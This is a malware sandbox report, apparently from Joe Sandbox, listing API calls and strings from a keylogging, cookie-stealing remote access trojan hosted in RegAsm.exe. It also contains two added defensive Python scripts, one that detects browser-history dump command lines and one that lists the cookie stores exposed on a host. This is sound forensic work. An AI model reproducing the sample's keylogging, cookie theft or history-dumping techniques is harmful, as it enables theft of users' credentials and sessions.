                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                  • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                                                                                  • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                  • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 1000536F
                                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                  • _free.LIBCMT ref: 10005381
                                                                                                                                  • _free.LIBCMT ref: 10005394
                                                                                                                                  • _free.LIBCMT ref: 100053A5
                                                                                                                                  • _free.LIBCMT ref: 100053B6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                  • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                  • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                  • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: fYM/
                                                                                                                                  • API String ID: 0-2459865102
                                                                                                                                  • Opcode ID: a6e3e212e3e8e69e5b3e90cc56111543990103d41b7ff965f9c36c1ca3af5bcd
                                                                                                                                  • Instruction ID: e0f187942aa90d3f3c40e731aaf8e1dc3f9218b11d74515a16622edea155382f
                                                                                                                                  • Opcode Fuzzy Hash: a6e3e212e3e8e69e5b3e90cc56111543990103d41b7ff965f9c36c1ca3af5bcd
                                                                                                                                  • Instruction Fuzzy Hash: C8519F75D0020AABFB11CFA4CD45FAE7BF9EF493A0F11405AF805A7299D731AA41CB61
                                                                                                                                  APIs
                                                                                                                                  • _strpbrk.LIBCMT ref: 0044E7B8
                                                                                                                                  • _free.LIBCMT ref: 0044E8D5
                                                                                                                                    • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                                                                                                                    • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                                                                                                    • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                  • String ID: *?$.
                                                                                                                                  • API String ID: 2812119850-3972193922
                                                                                                                                  • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                                                                  • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                                                                                                  • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                                                                  • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 1000655C
                                                                                                                                    • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                                                                                                    • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                                                                    • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                  • String ID: *?$.$fYM/
                                                                                                                                  • API String ID: 2667617558-1275761515
                                                                                                                                  • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                  • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                                                                  • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                  • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                                                                                    • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,02084830,00000010), ref: 004048E0
                                                                                                                                    • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                                                                  • String ID: 8)3$XQG$NG
                                                                                                                                  • API String ID: 1634807452-3379486406
                                                                                                                                  • Opcode ID: fb13a16f46cddbed72709e993f3cbffc98f6c9ec46674720dbf4ce9be84bef95
                                                                                                                                  • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                                                                                                  • Opcode Fuzzy Hash: fb13a16f46cddbed72709e993f3cbffc98f6c9ec46674720dbf4ce9be84bef95
                                                                                                                                  • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
• _free.LIBCMT ref: 004435E0
• _free.LIBCMT ref: 004435EA
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
• API String ID: 2506810119-1068371695
• Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
• Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
• Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
• Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
• _free.LIBCMT ref: 10004CE8
• _free.LIBCMT ref: 10004CF2
Strings
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
• API String ID: 2506810119-1068371695
• Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
• Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
• Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
• Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
APIs
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,?,00000000,?,?,10009C54,?,00000000,?), ref: 100099A8
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 100099D6
• GetLastError.KERNEL32(?,10009C54,?,00000000,?,00000000,00000000,?,00000000), ref: 10009A07
Strings
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: ByteCharErrorFileLastMultiWideWrite
• String ID: fYM/
• API String ID: 2456169464-2459865102
• Opcode ID: 427868bedf5aeb2dbe74816aae85c58cffe3606ac2297d0d696d101185ff0d15
• Instruction ID: 4dca0cb6e5ae08cfaecef52c11f05f5c50a0db4386d341a895ff8b0f45518e07
• Opcode Fuzzy Hash: 427868bedf5aeb2dbe74816aae85c58cffe3606ac2297d0d696d101185ff0d15
• Instruction Fuzzy Hash: 7D314375A002199FEB14CF69CC95AEAB7B9EF48344F0144ADE50AD7254D730AD81CB61
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63841986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
• Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
• String ID: /sort "Visit Time" /stext "$0NG
• API String ID: 368326130-3219657780
• Opcode ID: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
• Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
• Opcode Fuzzy Hash: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
• Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
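The function above assembles a command line containing `/sort "Visit Time" /stext "`, the switches used to make a NirSoft-style console tool write a browser-history dump as plain text, alongside a `.vbs` string and a 250 ms Sleep. The following detector is an added example (not Joe Sandbox output and not the sample's code) that runs those two tokens over process-creation records. The `ProcessEvent` field names are an assumption modelled on Sysmon Event ID 1, the events are constructed, and treating RegAsm.exe as a suspicious parent is an escalation heuristic drawn from the fact that this section's dumps come from a RegAsm.exe host.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Command-line fragments taken from the string table above. The sample
# builds /sort "Visit Time" /stext "<file>", which tells NirSoft-style
# console tools to dump results as plain text, sorted by visit time.
STEXT_RE = re.compile(r'/stext\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)
SORT_VISIT_TIME_RE = re.compile(r'/sort\s+"Visit Time"', re.IGNORECASE)


@dataclass
class ProcessEvent:
    """Minimal process-creation record. Field names are an ASSUMPTION
    modelled on Sysmon Event ID 1; map your own telemetry onto them."""
    image: str
    parent_image: str
    command_line: str


@dataclass
class Finding:
    severity: str
    reason: str
    output_path: str   # where the plaintext dump was written; collect it


def classify(ev: ProcessEvent) -> Optional[Finding]:
    m = STEXT_RE.search(ev.command_line)
    if m is None:
        return None
    output_path = m.group(1) if m.group(1) is not None else m.group(2)
    if SORT_VISIT_TIME_RE.search(ev.command_line):
        severity = "high"
        reason = 'browser-history dump with /sort "Visit Time" (exact pattern in this sample)'
    else:
        severity = "medium"
        reason = "/stext plaintext dump by an unidentified NirSoft-style tool"
    # This section's memory dumps come from a RegAsm.exe host process, so a
    # dump tool spawned by RegAsm.exe is escalated (heuristic, an ASSUMPTION).
    if ev.parent_image.lower().endswith("\\regasm.exe"):
        severity = "critical"
        reason += "; spawned by RegAsm.exe"
    return Finding(severity, reason, output_path)


def scan(events: List[ProcessEvent]) -> List[Tuple[ProcessEvent, Finding]]:
    hits = []
    for ev in events:
        f = classify(ev)
        if f is not None:
            hits.append((ev, f))
    return hits


# CONSTRUCTED sample events; they are not from the sandbox run.
SAMPLE_EVENTS = [
    ProcessEvent(
        image=r"C:\Users\victim\AppData\Local\Temp\bhv.exe",
        parent_image=r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
        command_line=r'"C:\Users\victim\AppData\Local\Temp\bhv.exe" /sort "Visit Time" /stext "C:\Users\victim\AppData\Local\Temp\hist.txt"',
    ),
    ProcessEvent(
        image=r"C:\Windows\System32\notepad.exe",
        parent_image=r"C:\Windows\explorer.exe",
        command_line=r'"C:\Windows\System32\notepad.exe" C:\Users\victim\notes.txt',
    ),
    ProcessEvent(
        image=r"C:\Tools\pv.exe",
        parent_image=r"C:\Windows\explorer.exe",
        command_line=r"C:\Tools\pv.exe /stext C:\Tools\out.txt",
    ),
]

if __name__ == "__main__":
    for ev, f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {ev.image}: {f.reason} -> {f.output_path}")
```

The `/stext` switch alone is legitimate admin tooling, hence only "medium"; the combination with `/sort "Visit Time"` and a RegAsm.exe parent is what ties a hit to this sample. The `output_path` is worth collecting before it is deleted, since it is the plaintext history the RAT was about to exfiltrate.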
APIs
• _wcslen.LIBCMT ref: 00416330
  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
  • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
  • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _wcslen$CloseCreateValue
• String ID: !D@$8)3$okmode
• API String ID: 3411444782-1053461680
• Opcode ID: 57136a84a30947c0709b98017b780919d60aa890551a81d584de28234602005d
• Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
• Opcode Fuzzy Hash: 57136a84a30947c0709b98017b780919d60aa890551a81d584de28234602005d
• Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
APIs
  • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
• PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
• PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
Strings
• User Data\Profile ?\Network\Cookies, xrefs: 0040C670
• User Data\Default\Network\Cookies, xrefs: 0040C63E
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
• API String ID: 1174141254-1980882731
• Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
• Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
• Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
• Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
APIs
  • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
• PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
• PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
Strings
• User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
• User Data\Default\Network\Cookies, xrefs: 0040C70D
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
• API String ID: 1174141254-1980882731
• Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
• Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
• Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
• Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
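The two functions above probe, with PathFileExistsW, the Chromium cookie database first under `User Data\Default\Network\Cookies` and then under `User Data\Profile ?\Network\Cookies`. The script below is an added example (not the sample's or Joe Sandbox's code) that reproduces the same probe order so a responder can list which cookie stores were present on a host and therefore in scope for theft. Joe Sandbox renders the profile number as `?`; that the sample substitutes a running index (`Profile 1`, `Profile 2`, ...), the way Chrome names additional profiles, is an assumption, as is the cap of ten profiles.

```python
import os
from typing import Callable, Iterator, List

# Relative paths from the string table above, joined with os.path.join so
# the same probe works from a Linux forensic workstation over a mounted image.
COOKIE_SUFFIX = os.path.join("Network", "Cookies")


def candidate_cookie_stores(user_data_dir: str, max_profiles: int = 10) -> Iterator[str]:
    """Yield cookie DB paths in the order the sample probes them:
    Default first, then numbered profiles (index substitution is an ASSUMPTION)."""
    yield os.path.join(user_data_dir, "Default", COOKIE_SUFFIX)
    for n in range(1, max_profiles + 1):
        yield os.path.join(user_data_dir, f"Profile {n}", COOKIE_SUFFIX)


def exposed_cookie_stores(
    user_data_dir: str,
    exists: Callable[[str], bool] = os.path.exists,
    max_profiles: int = 10,
) -> List[str]:
    """Cookie stores that exist, i.e. what the same PathFileExistsW checks
    would have found. `exists` is injectable so the logic can be tested
    without touching a real profile directory."""
    return [p for p in candidate_cookie_stores(user_data_dir, max_profiles) if exists(p)]


def chrome_user_data_dir(local_appdata: str) -> str:
    # Standard Chrome location under %LOCALAPPDATA%.
    return os.path.join(local_appdata, "Google", "Chrome", "User Data")


if __name__ == "__main__":
    base = chrome_user_data_dir(os.environ.get("LOCALAPPDATA", ""))
    for path in exposed_cookie_stores(base):
        print("cookie store present, sessions should be revoked:", path)
```

Presence on disk is all this check tells you. The `Cookies` file is an SQLite database whose values are encrypted with a key held in the profile's `Local State`, so whether the RAT could decrypt what it copied is a separate question; the safe response is still to invalidate every session for the listed profiles.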
APIs
• GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
• wsprintfW.USER32 ref: 0040B22E
  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: EventLocalTimewsprintf
• String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
• API String ID: 1497725170-1359877963
• Opcode ID: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
• Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
• Opcode Fuzzy Hash: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
• Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
APIs
  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
• CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
• CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTime$wsprintf
• String ID: Online Keylogger Started
• API String ID: 112202259-1258561607
• Opcode ID: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
• Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
• Opcode Fuzzy Hash: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
• Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
APIs
• LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
• GetProcAddress.KERNEL32(00000000), ref: 00406AC4
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: CryptUnprotectData$crypt32
• API String ID: 2574300362-2380590389
• Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
• Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
• Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
• Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
APIs
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
• CloseHandle.KERNEL32(?), ref: 004051CA
• SetEvent.KERNEL32(?), ref: 004051D9
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseEventHandleObjectSingleWait
• String ID: Connection Timeout
• API String ID: 2055531096-499159329
• Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
• Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
• Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
• Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
